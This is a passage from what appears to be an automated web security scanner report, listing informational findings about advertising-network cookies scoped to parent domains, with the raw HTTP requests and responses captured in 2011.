The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N763.usatoday.comOX3622/B5770010.5 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://espn.go.com/college-football/team/_/id/99/lsu-tigers?ex_cid=2011_bnnr_CFB_xxxx_awrs
Set-Cookie: id=229b025847010047|1181183/552924/15221|t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1; path=/; domain=.doubleclick.net; expires=Fri, 30 Aug 2013 01:33:36 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 04 Sep 2011 01:21:29 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


13.6. http://ad.turn.com/r/cs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /r/cs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cs?pid=18 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771; rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8932325985038971405; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:14:01 GMT; Path=/
Location: http://sync.adap.tv/sync?type=gif&key=turn&uid=8932325985038971405
Content-Length: 0
Date: Sun, 04 Sep 2011 01:14:00 GMT


13.7. http://ad.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=6&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:49 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:05:49 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&rnd=4338981458170383181&fpid=6&nu=n&t=
...[SNIP]...

13.8. http://ad.yabuka.com/statsin/adframe/803/300x250

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yabuka.com
Path:   /statsin/adframe/803/300x250

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /statsin/adframe/803/300x250 HTTP/1.1
Host: ad.yabuka.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 00:44:40 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Set-Cookie: client_id=laFpD31Wk2; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tc="cDF77OkBNtpIeBFOSP/PqGtaKOk=?_expires=STEzMTU1MTEwODAKLg==&client_id=UydsYUZwRDMxV2syJwpwMQou"; Domain=.yabuka.com; expires=Thu, 08-Sep-2011 19:44:40 GMT; Path=/
Content-Length: 2211

(function(c){var d=typeof ybk_url_prefix=="undefined"?"":ybk_url_prefix,e=typeof ybk_url_suffix=="undefined"?"":"/"+ybk_url_suffix;document.write('<style type="text/css">.yabuka_300x250{width:298px;he
...[SNIP]...

13.9. http://admeld.adnxs.com/usersync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:01:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:01:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 01:01:36 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=6422714091563403120&expiration=0" width="0" height="0"/>');

13.10. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1006093-1086373-1264419-1086372-1086371-1086370-1086369-1347038-1086733-1404407-317325-75921-1061877 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZmgoUly6wQ7sd+KSCvcGhz3F7fYu+DFw; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; udm_0=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; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; rsiPus_LVUM="MLtXrENrsF9nIAE6VbsxTYfBrZ+7yXZlgVXaxFRzRrgsYcYNfmdo4272ogCIBDOimYv4fEg9zw6j4jrFvDEmjHCoJT8voGTLmJnWzvbs49kTDrTctUCdQ99o84r443+VA4/6HCW3/BRNAYl5aPcaD1s59ilv5lMNITjZH4Wthbsni1n3csqYpkQ4kjzeD9Ag7v0g8pQ43kHlf0zkVU4="; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LVUM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LRgg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bTBF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bEm6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VfeO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YqeU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Dgt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PHh7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R5ta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sB-Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LIlC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rEo0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ig3D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5dcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dZVt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nZdO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jrA8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-EDR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LfdY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_w3Ik=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2hxF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_s6i9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qpw9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9q7G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X_m0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-vTc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Dp_w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zi3a=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EVuz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hG-O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3uh_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ed-o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DgP-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IyHz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9wJ3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3AjH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OeQh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJJI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IKnw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FRRz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Z-ZL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BlDK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Uce7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hYlJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tvYV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_N2Wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Xwgv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NpBx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7yN0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ytn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R0nn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jHB4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tbod=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dJ-5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tZle=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tAk2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2wEa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcnD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dTlc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RcWU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mv19=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nBsJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cIpx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qQG7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TK1Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ebC_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0lxQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_W97N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-cAf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fEAy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DcHG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-kXI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mvhC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jgOQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sECh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BUMx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aOWp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nXqC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DJxo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_m2_A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_M0jo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_I-qW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PC0B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OcGH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lpX7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_x85Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Y4G3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DxQf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WxUe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qxKk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DMxV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_irVm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9NFF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lc2G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Vs1Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zrkg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BAU5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6_lC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nHxo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R12Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AFG2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DAxJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OiN2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_22wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9z65=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cWvO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6AGk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X5fA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xCLB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VeZQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GdYU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Nuyz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9LuU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8hPO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__hgI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zCmS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zB78=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3cxz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0Svs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tIki=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VmnB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VnuE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jU0b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FnTH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8VJk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gN5g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NGZ6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ykIF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lvxT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ru6l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fsx9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mjM4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TAJT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_K27G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
